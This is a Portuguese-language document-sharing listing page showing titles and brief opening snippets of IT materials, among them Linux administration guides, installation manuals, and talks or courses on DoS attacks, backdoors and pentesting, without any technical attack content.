Alunos em técnico em Informática da EAFS: Leandro Cavalari, Maria Matos e Renata Rasche. sem que para tanto, o usuário necessite ter muito conhecimento no assunto. Vale citar que o Windows XP já vem com um firewall, que apesar de não ser tão eficiente, é um bom aliado na segurança. Para ativá-lo,

Leia mais

SISTEMAS DE LOG, TRATAMENTO DE ATAQUES E ERROS PROF.: PAULO RICARDO LISBOA DE ALMEIDA

SISTEMAS DE LOG, TRATAMENTO DE ATAQUES E ERROS PROF.: PAULO RICARDO LISBOA DE ALMEIDA SISTEMAS DE LOG, TRATAMENTO DE ATAQUES E ERROS PROF.: PAULO RICARDO LISBOA DE ALMEIDA LIDANDO COM ATAQUES A aplicação está sendo atacada E agora? LIDANDO COM ATAQUES A aplicação está sendo atacada E agora?

Leia mais

Como criar utilizadores

Como criar utilizadores Como criar utilizadores Existem três tipos de contas de Utilizadores, que contém toda a informação referente a um utilizador do domínio, nomeadamente: nome; password; grupos a que pertence no domínio,

Leia mais

MÓDULO 01 INTRODUÇÃO AO LINUX

MÓDULO 01 INTRODUÇÃO AO LINUX MÓDULO 01 INTRODUÇÃO AO LINUX TÓPICO 21 TÓPICO 22 TÓPICO 23 COMANDOS GERAIS ARQUIVOS E DIRETÓRIOS USUÁRIOS TÓPICO 21 COMANDOS GERAIS man date df -h arch clear logout echo login sudo TEORIA O comando man

Leia mais

Instalando e Executando o Siprev em Ambiente Linux Versão SIPREV 2.1.13

Instalando e Executando o Siprev em Ambiente Linux Versão SIPREV 2.1.13 Instalando e Executando o Siprev em Ambiente Linux Versão SIPREV 2.1.13 INSTALL 2010-05-20 ================================================== Instalando e Executando o Siprev em Ambiente Linux ATENÇÃO:

Leia mais

INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS

INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS 1 Índice INSTALANDO O HYPER-V EM UM S.O. WINDOWS...3 Passo 1: Habilite a virtualização na BIOS do computador...3 Passo 2: Instalando o Hyper-V...3

Leia mais

Manual de Instalação. Software (gerenciador) do Token SCE 6.0 StarSign Crypto USB

Manual de Instalação. Software (gerenciador) do Token SCE 6.0 StarSign Crypto USB Manual de Instalação Software (gerenciador) do Token SCE 6.0 StarSign Crypto USB Sistemas Operacionais: Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows 7 Manual de

Leia mais

Ataques DoS e DDoS. Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô. 1. Introdução

Ataques DoS e DDoS. Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô. 1. Introdução Ataques DoS e DDoS Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô 1. Introdução DoS - Denial of Service DDoS - Distributed Denial of Service Falhas no protocolo TCP/IP Ataques desde

Leia mais

Protocolos de Rede. Protocolos em camadas

Protocolos de Rede. Protocolos em camadas Protocolos de Rede Prof. Alexandre Beletti Protocolos em camadas Existem protocolos em diferentes camadas dos modelos de estudo (OSI e TCP/IP) Lembre-se de diferencias tipos de programas de tipos de protocolos

Leia mais

Manual Básico de Configuração MODELO:

Manual Básico de Configuração MODELO: Manual Básico de Configuração MODELO: 7898908277647 Especificações técnicas 7898908277647 CPU Memória Boot loader Gravação de dados Inerface de rede Porta Serial LEDs Extras Energia Dimensões Peso Temperatura

Leia mais

II ENSL. Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger.

II ENSL. Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger. II ENSL II Encontro Nordestino de Software Livre Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger. Jansen Sena Aracaju, SE Setembro, 2007 Sobre o palestrante Formação Mestrado pelo IC na Unicamp/SP

Leia mais

Configuração do log de sistema no Roteadores RV016, RV042, RV042G e RV082 VPN

Configuração do log de sistema no Roteadores RV016, RV042, RV042G e RV082 VPN Configuração do log de sistema no Roteadores RV016, RV042, RV042G e RV082 VPN Objetivo Um log de sistema (Syslog) é usado para registrar dados do computador. Você pode definir os exemplos que gerarão um

Leia mais

Administração de sistemas Linux. Gerenciamento de grupos e usuários

Administração de sistemas Linux. Gerenciamento de grupos e usuários Administração de sistemas Linux Gerenciamento de grupos e usuários Usuário Login: o nome do usuário. Cada nome deve ser único; Password: A senha de acesso ao sistema; UID: User Identification - É o número

Leia mais

IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017

IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017 IX (PTT) Fórum 11 São Paulo, SP 04 de dezembro de 2017 Cenário de Abuso dos Sistemas Autônomos Brasileiros Cristine Hoepers, D.Sc. Gerente Geral cristine@cert.br Estrutura do NIC.br Tratamento de Incidentes

Leia mais

Guia de instalação para ambiente de Desenvolvimento LINUX

Guia de instalação para ambiente de Desenvolvimento LINUX Guia de instalação para ambiente de Desenvolvimento LINUX Conteúdo deste manual Introdução O guia de instalação... 3 Capítulo 1 Instalando o servidor Web Apache... 4 Teste de instalação do Apache... 9

Leia mais

GTI IMPRESSORAS. Manual de instalação da ferramenta. Sistemas operacionais

GTI IMPRESSORAS. Manual de instalação da ferramenta. Sistemas operacionais Manual de instalação da ferramenta GTI IMPRESSORAS Sistemas operacionais Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows 7 Microsoft Windows 8 Linux Para confecção

Leia mais

Manual Técnico para Parceiros

Manual Técnico para Parceiros Manual Técnico para Parceiros Apresentação O serviço VPN SW GSURFNET está em produção no mercado desde 2006, conduzindo o tráfego das operações TEF sobre IP através de qualquer meio de acesso à Internet

Leia mais

ADMINISTRAÇÃO DE SISTEMAS UNIX Aula Prática 01 Sistemas Operacionais Gil Eduardo de Andrade

ADMINISTRAÇÃO DE SISTEMAS UNIX Aula Prática 01 Sistemas Operacionais Gil Eduardo de Andrade ADMINISTRAÇÃO DE SISTEMAS UNIX Aula Prática 01 Sistemas Operacionais Gil Eduardo de Andrade Introdução Os sistemas UNIX/Linux são caracterizados por serem: Interativo usuário requisita os comandos e obtém

Leia mais

Comandos. Sistema Operacional GNU/Linux. Para Manipulação de Contas

Comandos. Sistema Operacional GNU/Linux. Para Manipulação de Contas Comandos Para Manipulação de Contas Instituto Federal de Educação, Ciência e Tecnologia do Triângulo Mineiro Prof. Edwar Saliba Júnior Agosto / 2017 1/23 Comando adduser Adiciona um usuário ou grupo no

Leia mais

Administração de Sistemas Operacionais. Prof.: Marlon Marcon

Administração de Sistemas Operacionais. Prof.: Marlon Marcon Administração de Sistemas Operacionais Prof.: Marlon Marcon Gerenciamento de Usuários Aula 11 O que é uma conta Quando um computador é usado por muitas pessoas, é necessário diferencias os usuários, para,

Leia mais

20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP

20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP 20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP Problemas de Segurança e Incidentes com CPEs e Outros Dispositivos Cristine Hoepers cristine@cert.br Incidentes

Leia mais

Principais Comandos do Terminal no LINUX

Principais Comandos do Terminal no LINUX Principais Comandos do Terminal no LINUX Estes comandos não visam ser um compêndio completo de operação, haja vista que se possui mais comandos que esses aqui que serão listados, logo os comandos são:

Leia mais

Mecanismos de QoS em Linux DiffServ (Marcação e Policiamento)

Mecanismos de QoS em Linux DiffServ (Marcação e Policiamento) Mecanismos de QoS em Linux DiffServ (Marcação e Policiamento) Este roteiro descreve um cenário prático que ilustra o funcionamento dos mecanismos de policiamento e marcação utilizados pela metodologia

Leia mais

Ementa Oficial do. Curso Pentest: Técnicas de Invasão Básico

Ementa Oficial do. Curso Pentest: Técnicas de Invasão Básico Ementa Oficial do Curso Pentest: Técnicas de Invasão Básico Capítulo 01 Introdução Introdução ao Curso Termos Comuns Teste de Invasão (pentesting) Red Team (Equipe Vermelha) Hacking Ético White Hat Black

Leia mais

INFO ARQ REDES. Prova 2 Bimestre. Obs: Questões RASURADAS são consideradas como ERRADAS GABARITO

INFO ARQ REDES. Prova 2 Bimestre. Obs: Questões RASURADAS são consideradas como ERRADAS GABARITO INFO3 2018.1 ARQ REDES Prova 2 Bimestre Obs: Questões RASURADAS são consideradas como ERRADAS GABARITO NOME: MATRÍCULA: Q U E S T Õ E S O B J E T I V A S (Valor de cada questão: 0,7 pts) 1. [ExAEx] Não

Leia mais

Instalação do serviço de FTP com o Proftpd

Instalação do serviço de FTP com o Proftpd Tutorial - Proftpd Instalação do serviço de FTP com o Proftpd O Proftpd é um dos mais utilizados servidores de FTP da plataforma Linux. Sua instalação é rápida e fácil. Para instalar o pacote, digite o

Leia mais

Testes de Penetração: Força Bruta para Login em SSH

Testes de Penetração: Força Bruta para Login em SSH Testes de Penetração: Força Bruta para Login em SSH Segurança da Informação Charles Tim Batista Garrocho Instituto Federal de São Paulo IFSP Campus Campos do Jordão garrocho.ifspcjo.edu.br/sega6 charles.garrocho@ifsp.edu.br

Leia mais

Sistemas Operacionais de Rede Linux - Gerenciamento de Arquivos

Sistemas Operacionais de Rede Linux - Gerenciamento de Arquivos Sistemas Operacionais de Rede Linux - Gerenciamento de Arquivos Conteúdo Programático Login e Logout Iniciando e Desligando o Sistema Tipos de arquivo Texto Binário Arquivos e Diretório Manipulação de

Leia mais

12 Cloud Computing com o Windows Azure. Podemos usar o Jail em um ambiente na nuvem? [ Denis Augusto ]

12 Cloud Computing com o Windows Azure. Podemos usar o Jail em um ambiente na nuvem? [ Denis Augusto ] Sumário Olá, eu sou o DevMan! Desta página em diante, eu estarei lhe ajudando a compreender com ainda mais facilidade o conteúdo desta edição. Será um prazer contar com sua companhia! Confira abaixo o

Leia mais

Transferência de arquivo ASA com exemplo de configuração FXP

Transferência de arquivo ASA com exemplo de configuração FXP Transferência de arquivo ASA com exemplo de configuração FXP Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Informações de Apoio Mecanismo de transferência de arquivo através de FXP

Leia mais

Protocolos e Serviços de Redes

Protocolos e Serviços de Redes Protocolos e Serviços de Redes Redes de Computadores Charles Tim Batista Garrocho Instituto Federal de Minas Gerais IFMG Campus Ouro Branco garrocho.github.io charles.garrocho@ifmg.edu.br Sistemas de Informação

Leia mais